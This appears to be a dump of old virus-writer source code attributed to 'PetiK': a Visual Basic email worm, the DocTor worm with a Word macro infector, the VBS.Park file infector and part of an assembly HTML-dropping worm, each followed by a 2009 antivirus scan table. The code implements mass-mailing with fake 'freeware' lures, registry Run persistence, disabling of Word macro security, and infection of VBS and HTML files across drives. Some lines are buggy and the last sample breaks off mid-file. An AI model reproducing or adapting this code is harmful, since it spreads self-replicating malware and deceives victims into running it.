Const INTERNET_OPEN_TYPE_DIRECT = 1
Const INTERNET_OPEN_TYPE_PROXY = 3
Const INTERNET_FLAG_RELOAD = &H80000000
Dim hOpen As Long, hFile As Long, sBuffer As String, Ret As Long
Dim mlto As String
sBuffer = Space(25000)
hOpen = InternetOpen(scUserAgent, INTERNET_OPEN_TYPE_DIRECT, vbNullString, vbNullString, 0)
hFile = InternetOpenUrl(hOpen, site, vbNullString, ByVal 0&, INTERNET_FLAG_RELOAD, ByVal 0&)
InternetReadFile hFile, sBuffer, 25000, Ret
InternetCloseHandle hFile
InternetCloseHandle hOpen

For j = 1 To Len(sbufr)
If Mid(sBuffer, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(sBuffer, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(sBuffer, j + 7 + cnt, 1)
cnt = cnt + 1
Loop

Call SendMail(mlto)

End If
Next

End Sub

Sub SendMail(email As String)


Dim out
orig = App.Path & "\" & App.EXEName & ".exe"
Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
map.Logon "profile", "password"
Set mel = out.CreateItem(0)
mel.To = email
mel.Subject = "Congratulations for your site"
mel.Body = "Congratulations for your site" & vbCrLf & _
"This is a good tool to improve it." & vbCrLf & vbCrLf & _
"Best Regards."
mel.Attachments.Add orig, 1, 1, "WebMakeFullInstall.exe"
mel.Send
map.Logoff
Set out = Nothing
End Sub
File WormMars.exe received on 05.16.2009 19:58:38 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Mars!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Mars.worm.12800
AntiVir 7.9.0.168 2009.05.15 Worm/Mars.3
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Gubed.A@mm
Avast 4.8.1335.0 2009.05.15 Win32:Gubed
AVG 8.5.0.336 2009.05.15 I-Worm/Mars
BitDefender 7.2 2009.05.16 Win32.Mars.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Mars
ClamAV 0.94.1 2009.05.16 Worm.Mars
Comodo 1157 2009.05.08 Worm.Win32.Mars.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Generic.61
eSafe 7.0.17.0 2009.05.14 Win32.Mars
eTrust-Vet 31.6.6508 2009.05.16 Win32/Gubed
F-Prot 4.4.4.56 2009.05.16 W32/Gubed.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Mars
Fortinet 3.117.0.0 2009.05.16 W32/Gubed.A@mm
GData 19 2009.05.16 Win32.Mars.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Mars
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Mars
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Mars
McAfee 5616 2009.05.15 W32/Gubed@MM
McAfee+Artemis 5616 2009.05.15 W32/Gubed@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Mars.3
Microsoft 1.4602 2009.05.16 Worm:Win32/Gubed.A@mm
NOD32 4080 2009.05.15 Win32/Mars.A
Norman 6.01.05 2009.05.16 Gubed.A@mm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 Email-Worm.Mars!sd5
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.52.00 2009.05.16 Worm.Mail.Mars.a
Sophos 4.41.0 2009.05.16 W32/Mars-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Magistr.a.poly
Symantec 1.4.4.12 2009.05.16 W32.Gubed.int
TheHacker 6.3.4.1.326 2009.05.15 Trojan/Hami
TrendMicro 8.950.0.1092 2009.05.15 WORM_GUBED.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Mars
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Mars.12800
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petgub.A

Additional information
File size: 12800 bytes
MD5...: 1b81a0863eafb1a4b260df5c7c1d8621
SHA1..: 7c218fa9d30d54966f472e6703123d13e38152f1
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : W32.HLLW.DocTor
' Author : PetiK
' Language : Visual Basic
' Date : 22/06/2002

Attribute VB_Name = "Module1"


Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Const CSIDL_STARTUP = &H7


Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Public docv As String

Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
org = App.Path & "\" & App.EXEName & ".exe"

If InStr(1, GetCommLine, "/newrun") = 0 Then

docv = "C:\"
Randomize (Timer)
For i = 1 To 8
docv = docv & Chr(Int(Rnd(1) * 26) + 97)
Next i
docv = docv & ".txt"

Call Install
Call DocVir
Call VbsDrop

Else
Sleep 20000
DeleteFile GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"
chkinet:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo chkinet
Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
If out = "Outlook" Then
map.Logon "profile", "password"
For y = 1 To map.AddressLists.Count
Set z = map.AddressLists(y)
x = 1
Set mel = out.CreateItem(0)
For oo = 1 To z.AddressEntries.Count
e = z.AddressEntries(x)
ml.Recipients.Add e
x = x + 1
If x < 500 Then oo = z.AddressEntries.Count
Next oo
mel.Subject = "NewTool for Word Macro Virus"
mel.Body = "This tool allows you to protect you against unknown macro virus." & vbCrLf & _
"Click on the attached file to run this freeware." & vbCrLf & vbCrLf & _
"Best Regards. Have a nice day"
mel.Attachments.Add orig, 1, 1, "DocTor.exe"
mel.Send
e = ""
Next y
map.Logoff
End If

End If

End Sub

Sub Install()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")

org = App.Path & "\" & App.EXEName & ".exe"


cop = fso.GetSpecialfolder(0) & "\Doctor.exe"
copreg = fso.GetSpecialfolder(0) & "\Doctor.exe /newrun"

FileCopy org, cop


ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", copreg

End Sub

Sub DocVir()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"

Open orig For Binary As #1


DoEvents
Do While Not EOF(1)
DoEvents
Get #1, , bbyte
e = Hex(bbyte)
If Len(e) = 1 Then e = "0" & Hex(bbyte)
pefile = pefile & e
Loop
Close #1

hexf = "pef = """


For i = 1 To Len(pefile) Step 110
hexf = hexf & Mid(pefile, i, 110) & """" & vbCrLf & "pef = pef & """
Next
hexf = hexf & """" & vbCrLf

inst = "read = dec(pef)" & vbCrLf & _


"Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & ""\Doctor.exe"", 2)" & vbCrLf & _
"r.Write read" & vbCrLf & _
"r.Close" & vbCrLf & _
"ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor"", fso.GetSpecialFolder(0) & ""\Doctor.exe /newrun"""
conv = "Function dec(octe)" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"For hexad = 1 To Len(octe) Step 2" & vbCrLf & _
"dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _
"Next" & vbCrLf & _
"End Function" & vbCrLf

infwrd = "Set doc = ActiveDocument.VBProject.VBComponents(1)" & vbCrLf & _


"Set nor = NormalTemplate.VBProject.VBComponents(1)" & vbCrLf & _
"With Options" & vbCrLf & _
".ConfirmConversions = False" & vbCrLf & _
".VirusProtection = False" & vbCrLf & _
".SaveNormalPrompt = False" & vbCrLf & _
"End With" & vbCrLf & _
"Select Case Application.Version" & vbCrLf & _
"Case ""10.0""" & vbCrLf & _
"System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&" & vbCrLf & _
"System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&" & vbCrLf & _
"Case ""9.0""" & vbCrLf & _
"System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&" & vbCrLf & _
"End Select" & vbCrLf & _
"WordBasic.DisableAutoMacros 0" & vbCrLf & vbCrLf & _
"If nor.Name <> ""DocTor"" Then"
infwrd2 = "install doc, nor" & vbCrLf & _
"End If" & vbCrLf & _
"If doc.Name <> ""DocTor"" Then" & vbCrLf & _
"install nor, doc" & vbCrLf & _
"Activedocument.Save" & vbCrLf & _
"End If"

instal = "Private Sub install(src, dst)" & vbCrLf & _


"Set odst = dst.CodeModule" & vbCrLf & _
"Set osrc = src.CodeModule" & vbCrLf & _
"odst.DeleteLines 1, odst.CountOfLines" & vbCrLf & _
"odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines)" & vbCrLf & _
"End Sub" & vbCrLf

Open docv For Output As #1


Print #1, "Private Sub Document_Open()"
Print #1, "On Error Resume Next"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set ws=CreateObject(""WScript.Shell"")" & vbCrLf
Print #1, hexf
Print #1, infwrd
Print #1, inst
Print #1, infwrd2
Print #1, "End Sub" & vbCrLf
Print #1, instal
Print #1, conv
Close #1
End Sub

Sub VbsDrop()
On Error Resume Next
vbsdrp = GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs"

vbs = "On Error Resume Next" & vbCrLf & _


"set fso=createobject(""scripting.filesystemobject"")" & vbCrLf & _
"set ws=createobject(""wscript.shell"")" & vbCrLf & _
"Set wrd=createObject(""Word.Application"")" & vbCrLf & _
"wrd.options.virusprotection=0" & vbCrLf & _
"wrd.options.savenormalprompt=0" & vbCrLf & _
"wrd.options.confirmconversions=0" & vbCrLf & _
"ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"",1,""REG_DWORD""" & vbCrLf & _
"ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"",1,""REG_DWORD""" & vbCrLf & _
"ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"",1,""REG_DWORD""" & vbCrLf & _
"If wrd.normaltemplate.vbproject.vbcomponents(1).name <> ""DocTor"" then" & vbCrLf & _
"wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromfile(""" & docv & """)" & vbCrLf & _
"wrd.normaltemplate.vbproject.vbcomponents(1).name=""DocTor""" & vbCrLf & _
"End If" & vbCrLf & _
"wscript.sleep 500" & vbCrLf & _
"fso.deletefile """ & docv & """" & vbCrLf & _
"wrd.application.quit"

Open vbsdrp For Output As #1


Print #1, vbs
Close #1
End Sub

Private Function GetCommLine() As String


Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine
SLen = lstrlen(RetStr)
If SLen > 0 Then
GetCommLine = Space$(SLen)
CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
End If
End Function

Private Function GetSpecialfolder(CSIDL As Long) As String


Dim r As Long
Dim IDL As ITEMIDLIST
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = NOERROR Then
Path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
VBA Word Part

Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Private Sub Document_Open()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")

pef = "4D5A900000000000..."
pef = pef & "0000000000C00000..."
pef = pef & "53206D6F64652E0D..."
pef = pef & "2AAA88526963689D..."
pef = pef & "00000000000000"
pef = pef & ""

Set doc = ActiveDocument.VBProject.VBComponents(1)


Set nor = NormalTemplate.VBProject.VBComponents(1)
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0

If nor.Name <> "DocTor" Then


read = dec(pef)
Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & "\Doctor.exe", 2)
r.Write read
r.Close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", fso.GetSpecialFolder(0) & "\Doctor.exe /newrun"
install doc, nor
End If
If doc.Name <> "DocTor" Then
install nor, doc
ActiveDocument.Save
End If
End Sub

Private Sub install(src, dst)


Set odst = dst.CodeModule
Set osrc = src.CodeModule
odst.DeleteLines 1, odst.CountOfLines
odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines)
End Sub

Function dec(octe)
On Error Resume Next
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function

End Sub
File DocTor.exe received on 05.16.2009 11:30:42 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Dotor!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Dotor.worm.11776
AntiVir 7.9.0.168 2009.05.15 Worm/Dotor.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Dotor.A
Avast 4.8.1335.0 2009.05.15 Win32:Dotor
AVG 8.5.0.336 2009.05.15 I-Worm/Dotor
BitDefender 7.2 2009.05.16 Win32.Dotor.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Dotor
ClamAV 0.94.1 2009.05.15 Worm.Dotor
Comodo 1157 2009.05.08 Worm.Win32.DoTor.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Generic.62
eSafe 7.0.17.0 2009.05.14 Win32.Doctor
eTrust-Vet 31.6.6508 2009.05.16 Win32/Dotor
F-Prot 4.4.4.56 2009.05.15 W32/Dotor.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Dotor
Fortinet 3.117.0.0 2009.05.16 W32/Dotor.A!worm
GData 19 2009.05.16 Win32.Dotor.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Dotor
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Dotor
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Dotor
McAfee 5616 2009.05.15 W32/DoTor@MM
McAfee+Artemis 5616 2009.05.15 W32/DoTor@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Doctor.4
Microsoft 1.4602 2009.05.16 Worm:Win32/Dotor.A@mm
NOD32 4080 2009.05.15 Win32/DoTor.A
Norman 6.01.05 2009.05.16 Dotor.A@mm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Dotor.A
PCTools 4.4.2.0 2009.05.15 Email-Worm.Dotor!sd5
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Dotor.a
Sophos 4.41.0 2009.05.16 W32/Dotor-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Dotor.A@mm
Symantec 1.4.4.12 2009.05.16 W32.Dotor.A@mm
TheHacker 6.3.4.1.326 2009.05.15 W32/Dotor
TrendMicro 8.950.0.1092 2009.05.15 WORM_DOTOR.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Dotor
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Pettor.A

Additional information
File size: 11776 bytes
MD5...: 76ff0b311e26f1322c63023c30c54549
SHA1..: 143baa09884c13cd59eb048f756954e5a6d2bc6d
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
File DocTor.doc received on 05.16.2009 11:30:41 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Dotor
AntiVir 7.9.0.168 2009.05.15 W2000M/Bumdoc.A
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Dotor
Authentium 5.1.2.4 2009.05.15 W97M/Dotor.A
Avast 4.8.1335.0 2009.05.15 MW97:Dotor-A
AVG 8.5.0.336 2009.05.15 W97M/Bumdoc
BitDefender 7.2 2009.05.16 W97M.Dotor.A
CAT-QuickHeal 10.00 2009.05.15 W97M.Ethan
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 W97M.Doctor
eSafe 7.0.17.0 2009.05.14 O97M.GNinducc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Dotor.A
F-Prot 4.4.4.56 2009.05.15 W97M/Dotor.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Dotor
Fortinet 3.117.0.0 2009.05.16 W97M/Dotor.A
GData 19 2009.05.16 W97M.Dotor.A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Dotor
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Bumdoc.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Dotor.A
NOD32 4080 2009.05.15 W97M/Dotor.A
Norman 6.01.05 2009.05.16 W97M/Dotor.A
nProtect 2009.1.8.0 2009.05.16 W97M.Dotor.A
Panda 10.0.0.14 2009.05.15 W97M/Dotor.A
PCTools 4.4.2.0 2009.05.15 WORD.97.Pettor.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Micro Virus
Sophos 4.41.0 2009.05.16 WM97/Dotor-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Dotor.A (v)
Symantec 1.4.4.12 2009.05.16 W97M.Dotor.A@mm
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_DOTOR.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Dotor
ViRobot 2009.5.15.1737 2009.05.15 W97M.Dotor.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Pettor.A

Additional information
File size: 77312 bytes
MD5...: 762645157dbc893c564928edfed2413b
SHA1..: 66a67434fd6e3771666e4adaa28fd9b481f2b4bc
' Name : VBS.Park
' Author : PetiK
' Language : VBS
' Date : 24/06/2002

On Error Resume Next

Set fs=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")

Set fl=fs0.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close

f="virhex="""

For i=1 to Len(virus)


e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f & e
Next

f=f & """"


On Error Resume Next
For each drv in fs.Drives
If drv.DriveType=2 or drv.DriveType=3 Then
list(drv.path&"\")
End If
Next

Sub list(dir)
On Error Resume Next
For each ssf in fs.GetFolder(dir).SubFolders
infect(ssf.path)
list(ssf.path)
Next
End Sub

Sub infect(dir)
For each fil in fs.GetFolder(dir).Files
ext=lcase(fs.GetExtensionName(fil.path))

If ext="vbs" Then
Set vb=fs.OpenTextFile(Q.path,1)
If vb.ReadLine <> ""'VBS.Park"" Then
vbsorg=vb.ReadAll()
vb.Close
Set vb=fs.OpenTextFile(Q.path,2)
vb.WriteLine read(virhex)
vb.WriteLine vbsorg
vb.Close
Else
vb.Close
End If

ElseIf ext="htm" or ext="html" Then

Set ht=fs.OpentextFile(P.path,1)
htmf=ht.ReadAll
ht.Close
If InStr(1,htmf,"virhex",1) = 0 Then
Set ht=fs.OpentextFile(P.path,8)
ht.WriteBlankLines(2)
ht.WriteLine "<SCRIPT LANGUAGE=VBScript>"
ht.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
ht.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
ht.WriteLine f
ht.WriteLine "Infect(fso.GetSpecialFolder(0))"
ht.WriteLine "Infect(fso.GetSpecialFolder(1))"
ht.WriteLine "Infect(fso.GetSpecialFolder(2))"
ht.WriteLine "Infect(""C:\"")"
ht.WriteLine "Infect(ws.SpecialFolders(""MyDocuments""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Desktop""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Favorites""))"
ht.WriteLine "Sub Infect(dir)"
ht.WriteLine "For each Q in fs.GetFolder(dir).Files"
ht.WriteLine "ext=lcase(fs.GetExtensionName(Q.Name))"
ht.WriteLine "If ext=""vbs"" Then"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,1)"
ht.WriteLine "If vb.ReadLine <> ""'VBS.Park"" Then"
ht.WriteLine "vbsorg=vb.ReadAll()"
ht.WriteLine "vb.Close"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,2)"
ht.WriteLine "vb.WriteLine read(virhex)"
ht.WriteLine "vb.WriteLine vbsorg"
ht.WriteLine "vb.Close"
ht.WriteLine "Else"
ht.WriteLine "vb.Close"
ht.WriteLine "End If"
ht.WriteLine "End If"
ht.WriteLine "If ext=""htm"" or ext=""html"" Then"
ht.WriteLine "Set ht=fs.OpenTextFile(Q.Path,1)"
ht.WriteLine "If ht.ReadLine <> ""<vbshtmpark>"" Then"
ht.WriteLine "htmorg=ht.ReadAll()"
ht.WriteLine "ht.Close"
ht.WriteLine "Set ht=fs.CreateTextFile(Q.Path,2)"
ht.WriteLine "ht.WriteLine ""<vbshtmpark>"""
ht.WriteLine "ht.Write(htmorg)"
ht.WriteLine "ht.WriteLine document.body.CreateTextRange.htmltext"
ht.WriteLine "ht.Close"
ht.WriteLine "Else"
ht.WriteLine "ht.Close"
ht.WriteLine "End If"
ht.WriteLine "End If"
ht.WriteLine "Next"
ht.WriteLine "End Sub"
ht.WriteLine "Function read(octet)"
ht.WriteLine "For hexa=1 To Len(octet) Step 2"
ht.WriteLine "read=read & Chr(""&h"" & Mid(octet, hexa, 2))"
ht.WriteLine "Next"
ht.WriteLine "End Function"
ht.WriteLine "</SCRIPT>"
ht.Close

End If
End If
Next
End Sub
File Park.vbs received on 05.16.2009 18:00:31 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Park
AntiVir 7.9.0.168 2009.05.15 Worm/Alcaul.U3
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Park.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Park
BitDefender 7.2 2009.05.16 VBS.Park.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.42
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Park!intended
F-Prot 4.4.4.56 2009.05.16 VBS/Park.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.A
GData 19 2009.05.16 VBS.Park.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
McAfee 5616 2009.05.15 VBS/Park.b.intd
McAfee+Artemis 5616 2009.05.15 VBS/Park.b.intd
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Alcaul.U3
Microsoft 1.4602 2009.05.16 Virus:VBS/Park.gen
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/Petik.H
nProtect 2009.1.8.0 2009.05.16 VBS.Intended.Park.A
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 VBS.Park.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Dara
Sophos 4.41.0 2009.05.16 Junk/Park-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Dara
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_Parade.a
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Park
VirusBuster 4.6.5.0 2009.05.16 VBS.Park.A

Additional information
File size: 3107 bytes
MD5...: cfa6d1d7f6e6223bfdf9ae6350cc05b0
SHA1..: 8d988bc367ce0b20adcc177f2b73764a233d77cb
comment *
Name : Worm.dilan aka adlin aka linda
Author : PetiK
Date : June 26th 2002

Language : win32asm

Spreads via an HTML file and infects other HTM/HTML files in these folders:

- WINDOWS
- WINDOWS\SYSTEM
- WINDOWS\TEMP
- DESKTOP
- MY DOCUMENTS

.586p
.model flat
.code

JUMPS

include useful.inc
include win32api.inc

api macro a
extrn a:proc
call a
endm
start: pushad
@SEH_SetupFrame <jmp end_worm>

get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA

get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetWindowsDirectoryA
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi

copy_worm:
push 0
push edi
push esi
api CopyFileA

push 50
push edi
push 1
@pushsz "ScanW32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA

push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset cpywrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax

push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp

push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax

scan_mail:
xor edx,edx
mov edi,offset hex_f
push edi
p_c: lodsb
call conv_hex
stosw
car_s: dec size
cmp size,0
jne p_c
entr1: xor al,al
stosb
pop edi
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle

push 0
push 5
push offset mydoc
push 0
api SHGetSpecialFolderPathA
@pushsz "\dilan.htm"
push offset mydoc
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset mydoc
api CreateFileA
mov [hhtm],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hhtm]
api WriteFile
push [hhtm]
api CloseHandle

end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess

conv_hex:
PUSH ECX
PUSH EDI

XOR ECX, ECX


MOV CL, AL
PUSH ECX
SHR CL, 04h
LEA EDI, Tab_Hex
INC CL

@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL

@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX

RET

.data
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
mydoc db 70 dup (0)
hhtm dd ?
byte dd 0
size dd ?
Tab_Hex db "0123456789ABCDEF", 00h
s_htm: db '<dilan>',CRLF
db '<html><head><title>Only For You!</title></head><body>',CRLF
db '<script language=vbscript>',CRLF
db 'On Error Resume Next',CRLF
db 'Set fso=createobject("scripting.filesystemobject")',CRLF
db 'Set ws=createobject("wscript.shell")',CRLF
db 'If err.number=429 then',CRLF
db 'document.write "<font face size=''4'' color=black>You need ActiveX enabled to see this file<br>'
db '<a href=''javascript:location.reload()''>Click Here</a> to reload and CLICK YES</font>"',CRLF
db 'Else',CRLF
db 'asmhex="'
hex_f db 1024 * 13 dup (0)
db '"',CRLF
db 'read = dec(asmhex)',CRLF
db 'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)',CRLF
db 'r.Write read',CRLF
